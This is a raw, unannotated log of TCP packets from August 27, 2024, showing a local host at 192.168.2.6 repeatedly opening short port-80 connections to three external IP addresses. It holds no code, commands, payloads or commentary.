Aug 27, 2024 14:20:55.823837042 CEST	80	52403	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:55.824115992 CEST	80	52402	89.23.103.42	192.168.2.6
Aug 27, 2024 14:20:55.922568083 CEST	52404	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:55.927465916 CEST	80	52404	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:55.927580118 CEST	52404	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:55.927704096 CEST	52404	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:55.932476044 CEST	80	52404	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:56.945700884 CEST	80	52403	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:56.945775032 CEST	52403	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:57.069942951 CEST	52403	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:57.070270061 CEST	52405	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:57.075097084 CEST	80	52405	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:57.075161934 CEST	52405	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:57.075356007 CEST	52405	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:57.075375080 CEST	80	52403	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:57.075432062 CEST	52403	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:57.080130100 CEST	80	52405	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:57.517563105 CEST	80	52404	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:57.521454096 CEST	52404	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:57.521497011 CEST	52404	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:57.525500059 CEST	52406	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:57.526262045 CEST	80	52404	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:57.530320883 CEST	80	52406	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:57.533467054 CEST	52406	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:57.537408113 CEST	52406	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:57.542186975 CEST	80	52406	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:57.793627977 CEST	80	52405	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:57.795074940 CEST	52405	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:57.798402071 CEST	52407	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:57.798479080 CEST	52405	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:57.803859949 CEST	80	52407	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:57.804029942 CEST	52407	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:57.804152012 CEST	80	52405	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:57.804172993 CEST	52407	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:57.804250956 CEST	52405	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:57.808917046 CEST	80	52407	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:58.506805897 CEST	80	52407	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:58.506912947 CEST	52407	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:58.609859943 CEST	52407	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:58.610162973 CEST	52408	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:58.615048885 CEST	80	52408	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:58.615124941 CEST	52408	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:58.615166903 CEST	80	52407	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:58.615217924 CEST	52407	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:58.615361929 CEST	52408	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:58.620186090 CEST	80	52408	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:59.144351006 CEST	80	52406	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:59.144424915 CEST	52406	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:59.144503117 CEST	52406	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:59.149214983 CEST	80	52406	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:59.250830889 CEST	52409	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:59.255744934 CEST	80	52409	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:59.257425070 CEST	52409	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:59.257550001 CEST	52409	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:59.262351036 CEST	80	52409	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:59.379652023 CEST	80	52408	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:59.381509066 CEST	52408	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:59.383253098 CEST	52408	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:59.383491993 CEST	52410	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:59.388252974 CEST	80	52410	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:59.388417959 CEST	80	52408	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:59.388506889 CEST	52408	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:59.388560057 CEST	52410	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:59.388561010 CEST	52410	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:59.393321037 CEST	80	52410	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:59.826390028 CEST	52402	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:59.826394081 CEST	52409	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:59.826425076 CEST	52410	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:59.829170942 CEST	52411	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:59.834117889 CEST	80	52411	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:59.834242105 CEST	52411	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:59.837408066 CEST	52411	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:59.842251062 CEST	80	52411	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:59.939496040 CEST	52412	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:59.941394091 CEST	52413	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:59.944400072 CEST	80	52412	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:59.944499016 CEST	52412	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:59.944659948 CEST	52412	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:59.946285009 CEST	80	52413	89.23.103.42	192.168.2.6
Aug 27, 2024 14:20:59.946352005 CEST	52413	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:59.946847916 CEST	52413	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:59.949493885 CEST	80	52412	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:59.951597929 CEST	80	52413	89.23.103.42	192.168.2.6
Aug 27, 2024 14:21:00.699439049 CEST	80	52412	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:00.699495077 CEST	52412	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:00.703591108 CEST	52412	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:00.704019070 CEST	52414	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:00.708628893 CEST	80	52412	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:00.708678007 CEST	52412	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:00.708842993 CEST	80	52414	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:00.708899975 CEST	52414	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:00.709014893 CEST	52414	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:00.717854023 CEST	80	52414	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:01.421446085 CEST	80	52411	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:01.421529055 CEST	52411	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:01.421590090 CEST	52411	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:01.426475048 CEST	80	52411	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:01.487828970 CEST	80	52414	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:01.493398905 CEST	52414	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:01.798777103 CEST	52415	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:01.799200058 CEST	52414	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:01.799201965 CEST	52416	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:01.803642035 CEST	80	52415	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:01.804203987 CEST	80	52416	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:01.804270029 CEST	80	52414	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:01.804359913 CEST	52414	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:01.804361105 CEST	52415	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:01.804528952 CEST	52416	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:01.804531097 CEST	52415	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:01.808485031 CEST	52416	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:01.809267998 CEST	80	52415	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:01.813400030 CEST	80	52416	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:02.488617897 CEST	80	52416	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:02.488670111 CEST	52416	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:02.491993904 CEST	52416	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:02.492386103 CEST	52417	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:02.497215033 CEST	80	52416	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:02.497262955 CEST	52416	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:02.497263908 CEST	80	52417	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:02.497323036 CEST	52417	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:02.497450113 CEST	52417	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:02.502228975 CEST	80	52417	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:03.186808109 CEST	80	52417	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:03.186934948 CEST	52417	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:03.297389984 CEST	52417	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:03.297700882 CEST	52418	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:03.302531958 CEST	80	52418	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:03.302608967 CEST	52418	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:03.302721024 CEST	52418	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:03.302750111 CEST	80	52417	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:03.302798986 CEST	52417	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:03.307523966 CEST	80	52418	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:03.392906904 CEST	80	52415	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:03.392987013 CEST	52415	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:03.393053055 CEST	52415	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:03.395714045 CEST	52419	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:03.397926092 CEST	80	52415	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:03.400686026 CEST	80	52419	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:03.400759935 CEST	52419	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:03.400885105 CEST	52419	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:03.405755997 CEST	80	52419	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:03.841919899 CEST	52418	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:03.841964006 CEST	52419	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:03.841990948 CEST	52413	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:03.844825983 CEST	52420	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:03.844919920 CEST	52421	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:03.849627972 CEST	80	52420	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:03.849689960 CEST	80	52421	89.23.103.42	192.168.2.6
Aug 27, 2024 14:21:03.849700928 CEST	52420	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:03.849733114 CEST	52421	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:03.849884987 CEST	52421	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:03.849935055 CEST	52420	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:03.854805946 CEST	80	52421	89.23.103.42	192.168.2.6
Aug 27, 2024 14:21:03.854815960 CEST	80	52420	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:03.955565929 CEST	52422	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:03.961656094 CEST	80	52422	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:03.961807013 CEST	52422	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:03.962125063 CEST	52422	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:03.966886044 CEST	80	52422	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:04.585531950 CEST	80	52420	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:04.585592985 CEST	52420	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:04.728501081 CEST	52420	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:04.728887081 CEST	52423	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:04.734639883 CEST	80	52423	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:04.734699965 CEST	52423	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:04.735589981 CEST	80	52420	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:04.735637903 CEST	52420	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:04.747980118 CEST	52423	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:04.757066965 CEST	80	52423	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:05.438329935 CEST	80	52423	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:05.443934917 CEST	52423	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:05.443936110 CEST	52423	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:05.445410013 CEST	52424	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:05.450314045 CEST	80	52423	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:05.450541973 CEST	80	52424	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:05.453469038 CEST	52423	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:05.453469038 CEST	52424	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:05.457413912 CEST	52424	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:05.462255001 CEST	80	52424	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:05.545494080 CEST	80	52422	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:05.549494028 CEST	52422	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:05.549494028 CEST	52422	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:05.553406954 CEST	52425	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:05.554349899 CEST	80	52422	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:05.558906078 CEST	80	52425	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:05.561561108 CEST	52425	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:05.561561108 CEST	52425	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:05.566494942 CEST	80	52425	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:06.152420044 CEST	80	52424	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:06.152888060 CEST	52424	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:06.266484022 CEST	52426	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:06.266488075 CEST	52424	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:06.277009964 CEST	80	52426	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:06.277267933 CEST	52426	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:06.277353048 CEST	52426	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:06.277872086 CEST	80	52424	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:06.277991056 CEST	52424	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:06.282557964 CEST	80	52426	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:06.955475092 CEST	80	52426	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:06.955545902 CEST	52426	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:06.957966089 CEST	52426	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:06.958286047 CEST	52427	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:06.963114023 CEST	80	52426	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:06.963145018 CEST	80	52427	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:06.963176966 CEST	52426	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:06.963238001 CEST	52427	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:06.963428974 CEST	52427	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:06.968183994 CEST	80	52427	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:07.229336023 CEST	80	52425	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:07.229399920 CEST	52425	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:07.229473114 CEST	52425	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:07.240524054 CEST	80	52425	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:07.344342947 CEST	52428	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:07.349380970 CEST	80	52428	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:07.349493980 CEST	52428	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:07.349576950 CEST	52428	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:07.354286909 CEST	80	52428	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:07.666795015 CEST	80	52427	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:07.666858912 CEST	52427	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:07.782315016 CEST	52427	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:07.782660007 CEST	52429	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:07.788177013 CEST	80	52429	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:07.788244009 CEST	52429	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:07.788674116 CEST	80	52427	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:07.788696051 CEST	52429	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:07.788722992 CEST	52427	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:07.793529987 CEST	80	52429	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:07.857536077 CEST	52429	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:07.857592106 CEST	52421	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:07.857645988 CEST	52428	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:07.860143900 CEST	52430	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:07.860297918 CEST	52431	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:07.865145922 CEST	80	52430	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:07.865164995 CEST	80	52431	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:07.865219116 CEST	52430	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:07.865238905 CEST	52431	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:07.865360022 CEST	52431	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:07.865361929 CEST	52430	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:07.870177031 CEST	80	52431	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:07.870383978 CEST	80	52430	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:07.969237089 CEST	52432	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:07.974185944 CEST	80	52432	89.23.103.42	192.168.2.6
Aug 27, 2024 14:21:07.974266052 CEST	52432	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:07.974399090 CEST	52432	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:07.981080055 CEST	80	52432	89.23.103.42	192.168.2.6
Aug 27, 2024 14:21:08.549509048 CEST	80	52430	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:08.549567938 CEST	52430	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:08.657077074 CEST	52430	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:08.657461882 CEST	52433	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:08.662115097 CEST	80	52430	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:08.662169933 CEST	52430	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:08.662237883 CEST	80	52433	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:08.662295103 CEST	52433	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:08.662426949 CEST	52433	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:08.667196989 CEST	80	52433	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:09.345868111 CEST	80	52433	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:09.347465038 CEST	52433	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:09.349853992 CEST	52433	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:09.350145102 CEST	52434	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:09.355012894 CEST	80	52434	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:09.355024099 CEST	80	52433	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:09.355104923 CEST	52433	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:09.355104923 CEST	52434	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:09.355226040 CEST	52434	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:09.359993935 CEST	80	52434	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:09.452423096 CEST	80	52431	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:09.453510046 CEST	52431	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:09.453510046 CEST	52431	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:09.458410978 CEST	80	52431	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:09.565428972 CEST	52435	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:09.570631981 CEST	80	52435	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:09.570733070 CEST	52435	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:09.570884943 CEST	52435	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:09.575692892 CEST	80	52435	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:10.043936968 CEST	80	52434	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:10.044027090 CEST	52434	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:10.165220976 CEST	52434	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:10.167457104 CEST	52436	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:10.172738075 CEST	80	52436	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:10.172753096 CEST	80	52434	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:10.172838926 CEST	52436	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:10.172838926 CEST	52434	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:10.173367023 CEST	52436	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:10.178652048 CEST	80	52436	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:10.861529112 CEST	80	52436	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:10.861572027 CEST	52436	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:10.865442038 CEST	52436	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:10.865878105 CEST	52438	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:10.870570898 CEST	80	52436	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:10.870614052 CEST	52436	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:10.870721102 CEST	80	52438	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:10.870779037 CEST	52438	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:10.870944977 CEST	52438	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:10.875721931 CEST	80	52438	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:11.209073067 CEST	80	52435	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:11.209254980 CEST	52435	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:11.300710917 CEST	52435	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:11.304665089 CEST	52439	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:11.305603981 CEST	80	52435	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:11.309609890 CEST	80	52439	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:11.309679985 CEST	52439	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:11.310213089 CEST	52439	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:11.315061092 CEST	80	52439	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:11.603604078 CEST	80	52438	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:11.603791952 CEST	52438	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:11.729923964 CEST	52438	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:11.730257988 CEST	52440	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:11.735158920 CEST	80	52440	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:11.735565901 CEST	52440	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:11.735989094 CEST	80	52438	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:11.739511967 CEST	52440	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:11.739672899 CEST	52438	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:11.744324923 CEST	80	52440	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:11.873589993 CEST	52432	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:11.873743057 CEST	52439	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:11.873745918 CEST	52440	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:11.881485939 CEST	52442	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:11.881485939 CEST	52441	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:11.888036013 CEST	80	52442	89.23.103.42	192.168.2.6
Aug 27, 2024 14:21:11.888048887 CEST	80	52441	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:11.888130903 CEST	52441	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:11.888130903 CEST	52442	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:11.888269901 CEST	52441	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:11.888380051 CEST	52442	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:11.893018961 CEST	80	52441	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:11.893100977 CEST	80	52442	89.23.103.42	192.168.2.6
Aug 27, 2024 14:21:11.989418030 CEST	52443	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:11.994234085 CEST	80	52443	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:11.994472980 CEST	52443	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:11.994586945 CEST	52443	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:11.999347925 CEST	80	52443	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:12.635126114 CEST	80	52441	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:12.635236025 CEST	52441	80	192.168.2.6	185.208.158.116
